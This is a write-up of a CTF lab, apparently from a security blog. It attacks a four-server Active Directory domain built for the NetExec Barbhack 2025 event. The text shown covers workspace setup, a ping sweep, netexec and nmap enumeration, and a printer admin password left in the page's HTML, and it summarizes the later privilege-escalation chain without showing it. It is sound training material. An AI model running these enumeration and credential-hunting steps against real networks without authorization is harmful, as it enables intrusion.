Members of the NetExec team created a small lab as a CTF for the Barbhack conference that took place in August 2025 in the South of France. There are four Windows servers on an Active Directory domain. I’ll find a leaked password on a printer webpage to get access to print jobs where I find initial passwords, some of which still work. I’ll use that to get into the domain, coercing an authentication that I can relay into RBCD to get a ticket at admin on the webserver. I’ll decrypt a saved password on that machine to get access to a new SMB share where I’ll find a GMSA credential in a file. That user can abuse impersonation in the MSSQL database to become sa, where I’ll abuse SeImpersonatePrivilege to get SYSTEM on the DB server. That server has constrained delegation over another, which I’ll abuse with RBCD to get there, and find a backup of ntds.dit. None of the hashes are still good, but a comment on a user provides the domain admin password and completely owns the domain.
Lab Details
Date: 30 Aug 2025
Creators: mpgn, mael91620
Hosts: BLACKPEARL, JOLLYROGER, QUEENREV, FLYINGDUTCHMAN
Description: Welcome to the NetExec Active Directory Lab! This lab is designed to teach you how to exploit Active Directory (AD) environments using the powerful tool NetExec. Originally featured in the Barbhack 2025 CTF, this lab is now available for free to everyone! In this lab, you’ll explore how to use the powerful tool NetExec to efficiently compromise an Active Directory domain during an internal pentest. The ultimate goal? Become Domain Administrator by following various attack paths! Ahoy, matey! Time to conquer the Seven Seas and claim the PIRATES.BRB domain!
Background
Lab
The CTF starting documentation describes a lab with the domain PIRATES.BRB, with four servers:
- BLACKPEARL (192.168.10.10) - Domain Controller
- JOLLYROGER (192.168.10.11) - Web Application Server (Caddy on port 8080)
- QUEENREV (192.168.10.12) - MSSQL Server
- FLYINGDUTCHMAN (192.168.10.13) - Windows Server with NTDS backup
My setup is actually in the 10.2.10.0/24 IP range. My attack VM is 10.2.10.99.
It also gives an Attack Path Summary
- Initial Enumeration - Identify servers and services
- Web Application - Find credentials on the printer web interface
- Flag 1 - User’s descriptions
- Flag 2 - SMB share access
- Flag 3 - Group Policy Preferences
- Flag 4 - NTLMv1 relay to LDAP + SPN-less RBCD
- Flag 5 - DPAPI for local account
- Flag 6 - GMSA offline recovery + MSSQL impersonation
- Flag 7 - MSSQL command execution + S4U2Self privilege escalation
- Flag 8 - Kerberos Constrained Delegation without Protocol Transition
- Flag 9 - NTDS backup forensics → Domain Admin
I’m not going to read that too closely, but it will provide guidance on where to look next should I get stuck.
netexec Setup
Default Workspace
I’m going to be using the NetExec workspaces feature for this lab. To start, I’ll drop into nxcdb and show there is currently only the default workspace:
oxdf@hacky$ nxcdb
(Cmd) workspace list
[*] Enumerating Workspaces
default
I can check out the default workspace:
(Cmd) workspace default
nxcdb (default) >
Then I need to pick a protocol (only smb, mssql, and winrm are supported at this point). I’ll use winrm:
nxcdb (default) > proto winrm
nxcdb (default)(winrm) > help
Documented commands (type help <topic>):
========================================
clear_database creds exit export help hosts
Undocumented commands:
======================
back import
nxcdb (default)(winrm) >
One option is to list creds:
nxcdb (default)(winrm) > creds
+Credentials---------+-----------+-----------------+-------------------+----------------------------------+
| CredID | Admin On | CredType | Domain | UserName | Password |
+--------+-----------+-----------+-----------------+-------------------+----------------------------------+
| 1 | 1 Host(s) | plaintext | INFILTRATOR | winrm_svc | <redacted> |
| 2 | 1 Host(s) | plaintext | CICADA | emily.oscars | <redacted> |
...[snip]...
+--------+-----------+-----------+-----------------+-------------------+----------------------------------+
This is important to know about, as if this database collects real credentials during some kind of legit engagement, I want to know to clean them out once I’m done.
Create Workspace
For this lab, I want a unique workspace, so I’ll create one:
nxcdb (default) > workspace create pirates.brb
[*] Creating workspace 'pirates.brb'
[*] Creating pirates.brb workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing VNC protocol database
[*] Initializing SSH protocol database
[*] Initializing FTP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Initializing WMI protocol database
[*] Initializing NFS protocol database
nxcdb (pirates.brb) >
This creates a new directory in ~/.nxc/workspaces with a handful of SQLite files:
oxdf@hacky$ ls ~/.nxc/workspaces/
default pirates.brb
oxdf@hacky$ ls ~/.nxc/workspaces/*
/home/oxdf/.nxc/workspaces/default:
ftp.db ldap.db mssql.db nfs.db rdp.db smb.db ssh.db vnc.db winrm.db wmi.db
/home/oxdf/.nxc/workspaces/pirates.brb:
ftp.db ldap.db mssql.db nfs.db rdp.db smb.db ssh.db vnc.db winrm.db wmi.db
Should I want to remove a workspace, rm -rf ~/.nxc/workspaces/<name> is the only way I know of.
Creating the workspace made it active. I can switch using the workspace command:
nxcdb (pirates.brb) > workspace default
nxcdb (default) > workspace pirates.brb
nxcdb (pirates.brb) >
Whichever workspace is active when I exit nxcdb is the one netexec writes to the next time it runs.
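Because a workspace keeps collecting credentials across runs, the clean-up question raised above deserves a quick audit before a workspace is archived or deleted. The script below is an added example, not part of the post or of NetExec: it opens every protocol database in a workspace directory read-only, counts the rows of every table, and reports the credential tables that are still non-empty. It assumes (not confirmed by the page) that nxc stores credentials in a table named `credentials`; the inventory itself does not depend on that name. To run offline it builds a constructed workspace in a temporary directory that mirrors the two redacted `winrm` rows seen in the default workspace.

```python
import sqlite3
import tempfile
from contextlib import closing
from pathlib import Path

# Real location of nxc workspaces (from the page). The demo never touches it;
# it builds a throwaway copy in a temp directory instead.
WORKSPACES_DIR = Path.home() / ".nxc" / "workspaces"


def inventory_workspace(ws_dir: Path) -> dict:
    """Return {db_file: {table_name: row_count}} for one workspace directory."""
    report = {}
    for db_path in sorted(ws_dir.glob("*.db")):
        # Read-only URI: an audit must never be able to modify collected data.
        with closing(sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)) as conn:
            tables = [row[0] for row in conn.execute(
                "SELECT name FROM sqlite_master WHERE type='table' "
                "AND name NOT LIKE 'sqlite_%'")]
            report[db_path.name] = {
                t: conn.execute(f'SELECT COUNT(*) FROM "{t}"').fetchone()[0]
                for t in tables}
    return report


def leftover_credentials(report: dict) -> dict:
    """{db_file: rows} for every non-empty credentials table, i.e. what still needs wiping.

    Assumption (not from the page): nxc names the table "credentials".
    """
    return {db: tables["credentials"] for db, tables in report.items()
            if tables.get("credentials", 0) > 0}


def make_sample_workspace(root: Path) -> Path:
    """Constructed stand-in for a workspace (sample data, not real nxc output)."""
    ws = root / "sample.brb"
    ws.mkdir(parents=True, exist_ok=True)
    for proto in ("smb", "winrm", "mssql"):
        with closing(sqlite3.connect(ws / f"{proto}.db")) as conn:
            conn.execute("CREATE TABLE credentials (id INTEGER PRIMARY KEY, "
                         "domain TEXT, username TEXT, password TEXT, credtype TEXT)")
            conn.execute("CREATE TABLE hosts (id INTEGER PRIMARY KEY, ip TEXT, hostname TEXT)")
            conn.commit()
    with closing(sqlite3.connect(ws / "winrm.db")) as conn:
        # Mirrors the two redacted rows listed in the default workspace above.
        conn.executemany("INSERT INTO credentials VALUES (?,?,?,?,?)", [
            (1, "INFILTRATOR", "winrm_svc", "<redacted>", "plaintext"),
            (2, "CICADA", "emily.oscars", "<redacted>", "plaintext")])
        conn.commit()
    return ws


def run_demo() -> tuple:
    """Build the sample workspace in a temp dir, audit it, return (report, leftovers)."""
    with tempfile.TemporaryDirectory() as tmp:
        ws = make_sample_workspace(Path(tmp))
        report = inventory_workspace(ws)
        return report, leftover_credentials(report)


if __name__ == "__main__":
    report, leftovers = run_demo()
    for db, tables in report.items():
        print(f"{db}: {tables}")
    print("credentials still stored:", leftovers)
```

Pointing `inventory_workspace` at `WORKSPACES_DIR / "pirates.brb"` gives the same report for the real workspace; if `leftover_credentials` comes back empty after an engagement, the `rm -rf` mentioned above removes only empty databases.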
Recon
Network
While the documentation gives a bit more information about the servers, I’m going to start with just the class C of 10.2.10.0/24. I’ll start with a simple ping sweep:
oxdf@hacky$ for i in {1..254}; do (ping -c 1 10.2.10.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
64 bytes from 10.2.10.10: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.11: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.12: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.13: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.99: icmp_seq=1 ttl=64 time=109 ms
64 bytes from 10.2.10.254: icmp_seq=1 ttl=63 time=109 ms
.99 is my VM, and .254 is out of scope for this challenge. I’ll focus on the four at .10 - .13.
netexec will find these same four hosts:
oxdf@hacky$ netexec smb 10.2.10.0/24
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
They are each Windows Server 2022. There’s a domain, pirates.brb. I’ll take this opportunity to generate hosts entries:
oxdf@hacky$ netexec smb 10.2.10.0/24 --generate-hosts-file hosts
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
oxdf@hacky$ cat hosts
10.2.10.12 QUEENREV.PIRATES.BRB QUEENREV
10.2.10.11 JOLLYROGER.PIRATES.BRB JOLLYROGER
10.2.10.10 BLACKPEARL.PIRATES.BRB PIRATES.BRB BLACKPEARL
10.2.10.13 FLYINGDUTCHMAN.PIRATES.BRB FLYINGDUTCHMAN
oxdf@hacky$ cat hosts /etc/hosts | sponge /etc/hosts
Now I can interact with the servers by hostname:
oxdf@hacky$ ping -c 1 blackpearl.pirates.brb
PING BLACKPEARL.PIRATES.BRB (10.2.10.10) 56(84) bytes of data.
64 bytes from BLACKPEARL.PIRATES.BRB (10.2.10.10): icmp_seq=1 ttl=127 time=111 ms
--- BLACKPEARL.PIRATES.BRB ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 110.844/110.844/110.844/0.000 ms
BLACKPEARL
nmap
nmap finds 28 open TCP ports on BLACKPEARL:
oxdf@hacky$ nmap -p- --min-rate 10000 -vvv 10.2.10.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:23 UTC
...[snip]...
Nmap scan report for 10.2.10.10
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2026-01-25 02:23:58 UTC for 7s
Not shown: 65507 closed tcp ports (reset)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
57020/tcp open unknown syn-ack ttl 127
57023/tcp open unknown syn-ack ttl 127
57024/tcp open unknown syn-ack ttl 127
57029/tcp open unknown syn-ack ttl 127
64388/tcp open unknown syn-ack ttl 127
64412/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.30 seconds
Raw packets sent: 68914 (3.032MB) | Rcvd: 65689 (2.628MB)
oxdf@hacky$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.2.10.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:25 UTC
Nmap scan report for 10.2.10.10
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-25 02:25:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PIRATES.BRB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PIRATES.BRB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: BLACKPEARL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BLACKPEARL, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:aa:b0:9f (unknown)
| smb2-time:
| date: 2026-01-25T02:25:41
|_ start_date: N/A
|_clock-skew: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.78 seconds
The box shows many of the ports associated with a Windows Domain Controller. The domain is PIRATES.BRB, and the hostname is BLACKPEARL.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
nmap notes a clock skew of only 1 second, so I’m good to take actions that use Kerberos auth.
I could try to brute force usernames and passwords over Kerberos, but I’ll only come back to that if I get nothing from the other hosts. Once I find creds, I can collect BloodHound data and look to connect over WinRM.
SMB - TCP 445
I’ll check for open SMB shares, but not find any:
oxdf@hacky$ netexec smb blackpearl.pirates.brb --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
oxdf@hacky$ netexec smb blackpearl.pirates.brb -u guest -p '' --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb blackpearl.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\oxdf: STATUS_LOGON_FAILURE
I’ll note that SMB signing is required (netexec reports signing:True), which means I can’t relay NTLM authentication to SMB on this DC. LDAP, on the other hand, does not have signing enforced:
oxdf@hacky$ netexec ldap blackpearl.pirates.brb
LDAP 10.2.10.10 389 BLACKPEARL [*] Windows Server 2022 Build 20348 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:None) (channel binding:No TLS cert)
netexec also shows null auth enabled for SMB, but that just means that a null session can be established, not that it provides useful access.
JOLLYROGER
nmap
nmap finds 17 open TCP ports on JOLLYROGER:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.2.10.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:34 UTC
...[snip]...
Nmap scan report for 10.2.10.11
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2026-01-25 02:34:50 UTC for 7s
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
8080/tcp open http-proxy syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.30 seconds
Raw packets sent: 69056 (3.038MB) | Rcvd: 65584 (2.623MB)
oxdf@hacky$ nmap -p 135,139,445,3389,5985,5986,8080 -sCV 10.2.10.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:35 UTC
Nmap scan report for 10.2.10.11
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PIRATES
| NetBIOS_Domain_Name: PIRATES
| NetBIOS_Computer_Name: JOLLYROGER
| DNS_Domain_Name: PIRATES.BRB
| DNS_Computer_Name: JOLLYROGER.PIRATES.BRB
| DNS_Tree_Name: PIRATES.BRB
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T02:35:43+00:00
|_ssl-date: 2026-01-25T02:35:48+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=JOLLYROGER.PIRATES.BRB
| Not valid before: 2026-01-22T20:58:17
|_Not valid after: 2026-07-24T20:58:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=WIN2022-SRV-X64
| Subject Alternative Name: DNS:WIN2022-SRV-X64, DNS:WIN2022-SRV-X64
| Not valid before: 2025-11-21T05:59:37
|_Not valid after: 2035-11-19T05:59:37
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Caddy httpd
|_http-title: HP LaserJet Pro M404n - Web Interface
|_http-server-header: Caddy
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-25T02:35:44
|_ start_date: N/A
|_nbstat: NetBIOS name: JOLLYROGER, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:58:2f:aa (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.35 seconds
The box shows ports typically associated with a Windows Client / Server. NetBIOS confirms the hostname JOLLYROGER.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
RDP and WinRM are both open should I find creds. There’s also SMB and a webserver on 8080 to enumerate further.
SMB - TCP 445
I’m not able to list SMB shares without valid creds here either:
oxdf@hacky$ netexec smb jollyroger.pirates.brb --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb jollyroger.pirates.brb -u guest -p '' --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb jollyroger.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [-] PIRATES.BRB\oxdf:oxdf STATUS_LOGON_FAILURE
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
Web - TCP 8080
Visiting http://jollyroger.pirates.brb:8080/ shows the page for an HP LaserJet printer:
The Jobs tab has 50 jobs:
Some of these might be interesting to look at, but clicking on them says I don’t have sufficient access:
It does give a path to the document in /scan. If I try to visit /scan or /scan/doc_auto.pdf, it pops HTTP auth:
The Network tab can take Wi-Fi creds:
The Security tab is prefilled with the username admin and a password that’s hidden. If I look at the raw HTML, I’ll see that the value is present, “hplaserbarbhack”:
The Support tab has a form to request support:
QUEENREV
nmap
nmap finds 18 open TCP ports on QUEENREV:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.2.10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:44 UTC
...[snip]...
Nmap scan report for 10.2.10.12
Host is up, received reset ttl 127 (0.11s latency).
Scanned at 2026-01-25 13:44:43 UTC for 8s
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49796/tcp open unknown syn-ack ttl 127
62888/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.76 seconds
Raw packets sent: 70459 (3.100MB) | Rcvd: 65889 (2.636MB)
oxdf@hacky$ nmap -p 135,139,445,1433,3389,5985,5986 -sCV 10.2.10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:46 UTC
Nmap scan report for 10.2.10.12
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-01-25T13:46:47+00:00; +2s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-23T21:09:59
|_Not valid after: 2056-01-23T21:09:59
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PIRATES
| NetBIOS_Domain_Name: PIRATES
| NetBIOS_Computer_Name: QUEENREV
| DNS_Domain_Name: PIRATES.BRB
| DNS_Computer_Name: QUEENREV.PIRATES.BRB
| DNS_Tree_Name: PIRATES.BRB
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T13:46:40+00:00
| ssl-cert: Subject: commonName=QUEENREV.PIRATES.BRB
| Not valid before: 2026-01-22T20:58:17
|_Not valid after: 2026-07-24T20:58:17
|_ssl-date: 2026-01-25T13:46:47+00:00; +2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=WIN2022-SRV-X64
| Subject Alternative Name: DNS:WIN2022-SRV-X64, DNS:WIN2022-SRV-X64
| Not valid before: 2025-11-21T05:59:37
|_Not valid after: 2035-11-19T05:59:37
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-25T13:46:40
|_ start_date: N/A
|_nbstat: NetBIOS name: QUEENREV, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:4b:ad:20 (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.34 seconds
The box shows ports typically associated with a Windows Client / Server. NetBIOS confirms the hostname QUEENREV.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
MSSQL, RDP, and WinRM are all open should I find creds. There’s also SMB which could show something unauthenticated, but more likely I’ll need to come back once I have creds.
SMB - TCP 445
Just as with the other hosts, I’m not able to list SMB shares without valid creds here either:
oxdf@hacky$ netexec smb queenrev.pirates.brb --shares
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb queenrev.pirates.brb -u guest -p '' --shares
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb queenrev.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [-] PIRATES.BRB\oxdf:oxdf STATUS_LOGON_FAILURE
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
FLYINGDUTCHMAN
nmap
nmap finds 16 open TCP ports on FLYINGDUTCHMAN:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.2.10.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:50 UTC
...[snip]...
Nmap scan report for 10.2.10.13
Host is up, received reset ttl 127 (0.11s latency).
Scanned at 2026-01-25 13:50:55 UTC for 7s
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
Raw packets sent: 68896 (3.031MB) | Rcvd: 65604 (2.624MB)
oxdf@hacky$ nmap -p 135,139,445,3389,5985,5986 -sCV 10.2.10.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:51 UTC
Nmap scan report for 10.2.10.13
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-25T13:51:49+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: PIRATES
| NetBIOS_Domain_Name: PIRATES
| NetBIOS_Computer_Name: FLYINGDUTCHMAN
| DNS_Domain_Name: PIRATES.BRB
| DNS_Computer_Name: FLYINGDUTCHMAN.PIRATES.BRB
| DNS_Tree_Name: PIRATES.BRB
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T13:51:43+00:00
